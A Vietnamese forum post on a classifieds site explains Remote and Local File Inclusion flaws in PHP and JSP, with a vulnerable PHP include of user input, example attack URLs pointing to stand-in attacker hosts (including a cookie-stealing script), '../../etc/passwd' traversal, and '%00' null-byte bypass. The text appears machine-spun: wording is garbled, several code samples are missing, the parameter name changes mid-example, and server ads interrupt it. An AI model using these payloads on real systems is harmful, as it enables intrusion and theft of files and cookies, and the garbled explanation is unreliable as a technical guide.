Hàng khuyến mãi Hang khuyen mai hang thanh ly hàng thanh lý

Hãy chọn Truy cập bằng mobile | Tiếp tục
Từ khóa hot: Thời trang Đồng hồ Thẩm mỹ Xây dựng Chăm sóc sức khỏe   |  
Tìm nâng cao

Tấn công khai minh bạch thác lỗ hổng File Inclusion [Copy địa chỉ]

Thời gian đăng: 20/2/2019 10:03:51

Lỗ hổng File Inclusion cho phép tin tặc truy cập trái phép vào những tập tin nhạy cảm trên máy chủ web hoặc thực thi các tệp tin độc hại bằng phương pháp sử dụng công dụng “include”. Lỗ hổng này xảy ra do chế độ kiểm tra nguồn vào không được tiến hành tốt, khiến tin tặc hoàn toàn có thể khai quật và chèn các dự liệu ô nhiễm.

Hàm ‘Include’

trước khi nói về chi tiết cụ thể lỗ hổng, tất cả chúng ta cần hiểu sơ qua về một lời gọi hàm ‘include()’. Tất cả nội dung trong 1 file cụ thể sẽ được coppy vào một trong những file khác chứa lời gọi ‘include’. Phương pháp này được dùng nhằm tránh việc code lặp và có thể sử dụng bất kỳ khi nào. Lập trình viên thường sử dụng hàm include() nhằm mục tiêu thêm những tài liệu, tệp tin mã nguồn dùng chung của những tệp tin trong ứng dụng. Những nơi hay được dùng như footers, headers, menu files … dưới đây là một trong ví dụ dễ dàng và đơn giản về hàm include.

>>> Xem thêm: bán HP DL360 gen10


1. Một menu trang như sau

2. Menu trang này có thể được dùng lại trong tất cả các trang của phần mềm bằng phương pháp dùng hàm include()

abc.php


WELCOME


3. Giờ thì file menu.php đã được bao hàm trong file abc.php, bất kể khi nào abc.php được truy cập, nội dung trong file menu.php sẽ được sao chép vào abc.php & thực hiện.

mặc dù thế điều đó hoàn toàn có thể bị tin tặc khai quật & tiến công trở lại trang web gây những hậu quả không an toàn. Đây là 2 lỗ hổng chính rất không an toàn liên quan đến hàm include()

  • Remote file inclusion
  • Local file inclusion

Lưu ý: Trong PHP có một số hàm cũng có công dụng gần giống, hay các hàm do người lập trình tự viết như: Inlude_once(), require(), require_once()…

Lỗ hổng Remote file inclusion

RFI được cho phép tin tặc include và tiến hành trên sever phương châm một tệp tin được lưu trữ từ xa. Hacker rất có thể sử dụng RFI để chạy một mã độc trên cả máy của người dùng & phía máy chủ. Ảnh hưởng tác động của kiểu tấn công này thay đổi từ đánh cắp tạm bợ session token hoặc các dữ liệu của người dùng cho tới sự việc tải lên các webshell, mã độc nhằm mục tiêu đến xâm hại hoàn toàn hệ thống sever.

Lỗ hổng Remote file inclusion trong PHP

PHP có nguy hại cao bị tiến công RFI do việc sử dụng lệnh include rất nhiều và setup mặc định của server cũng tác động một trong những phần gì đó. Để bước đầu chúng ta cần tìm nơi chứa file include trong ứng dụng dựa vào dữ liệu đầu vào người dùng.

1. Trong những nơi chứa lỗ hổng có thể như ví dụ dưới đây, giá trị của ‘testfile’ được cung ứng bởi người dùng:

www.victim_site.com/abc.php?testfile=example

2. Mã nguồn PHP chứa lỗ hổng:

$test = $_REQUEST[“testfile”];Include($test.”.php”);

3. Thông số của ‘testfile’ được lấy từ phía người tiêu dùng. Đoạn mã sẽ lấy giá trị ‘testfile’ và trực tuyến include chúng nó vào file PHP.

4. Tiếp sau đây là ví dụ về 1 phía tiến công được dùng đối với đoạn mã trên:

www.victim_site.com/abc.php?test=https://www.attacker_site.com/attack_page

File “attack_page” được bao hàm vào trang có sẵn trên máy chủ và xúc tiến mỗi lúc trang “abc.php” được truy vấn. Hacker sẽ đưa mã độc vào “attack_page” & thực hiện hành vi ô nhiễm và độc hại.

Remote file inclusion trong JSP

>>> Xem thêm: x10drl-i


1. Giả sử một kịch bản nơi một trang JSP sử dụng “c:import” nhằm nhập một tên tệp tin nào đấy do người dùng cung ứng vào trang JSP Lúc Này thông qua biến nguồn vào ‘test’:

”>

Tấn công:

www.victim_site.com/abc.jsp?test=https://www.attackersite.com/stealingcookie.js

2. Script độc hại trong stealingcookie.js sẽ tiến hành đem vào trang của nạn nhân và điều khiển và tinh chỉnh bởi tin tặc.

tiến công Local file inclusion

Lỗ hổng Local file inclusion nằm trong quá trình include file cục bộ có sẵn trên server. Lỗ hổng xẩy ra khi nguồn vào người dùng chứa đường dẫn đến file sẽ phải include. Khi nguồn vào này chưa được kiểm tra, tin tặc rất có thể sử dụng những tên file mặc định và truy vấn trái phép đến chúng, Hacker cũng có thể lợi dụng các thông tin trả về trên để đọc được các tệp tin nhạy cảm trên các folder khác nhau bằng phương pháp chèn các ký tự đặc biệt quan trọng như “/”, “../”, “-“.

Local file inclusion trong PHP:

1. Ví dụ đường dẫn sau có thể bị tấn công:

https://victim_site/abc.php?file=userinput.txt

2. Giá trị của biến ‘file’ được lấy vào đoạn mã PHP dưới đây:


3. Giờ thì tin tặc sẽ đưa mã độc vào biến ‘file’ để truy vấn trái phép vào file trong cùng chủ mục hoặc sử dụng kí tự duyệt chỉ mục như “../” để dịch rời đến chỉ mục khác. Ví dụ tin tặc lấy được log bằng cách cung ứng đầu vào “/apache/logs/error.log” hoặc “/apache/logs/access.log” hay việc ăn cắp dữ liệu tương quan đến tài khoản của người dùng thông qua “../../etc/passwd” trên hệ thống Unix.

trong một số tình huống đặc biệt quan trọng một phần lan rộng ra mặc định sẽ được thêm vào thông tin được đẩy lên từ trình duyệt trước lúc đưa vào hàm Include(). Cách tốt nhất có thể tránh những phần lan rộng này là sử dụng byte rỗng kết thúc “%00” để đánh bại. Đó là cách được các tin tặc sử dụng để triển khai hành động độc hại và truy vấn bất kỳ kiểu file nào.

>>> Xem thêm: cho thuê máy chủ


Đánh giá

Lưu trữ | Phiên bản Mobile | Quy chế | Chính sách | Chợ24h

GMT+7, 29/3/2024 13:53 , Processed in 0.140376 second(s), 131 queries .

© Copyright 2011-2024 ISOFT®, All rights reserved
Công ty CP Phần mềm Trí tuệ
Số ĐKKD: 0101763368 do Sở KH & ĐT Tp. Hà Nội cấp lần đầu ngày 13/7/2005, sửa đổi lần thứ 4 ngày 03/11/2011
Văn phòng: Tầng 9, Tòa Linh Anh, Số 47-49 Khuất Duy Tiến, P. Thanh Xuân Bắc, Q. Thanh Xuân, Hà Nội
Tel: (84) 2437 875018 | (84) 2437 875017 | E-Mail: cho24h@isoftco.com

Lên trên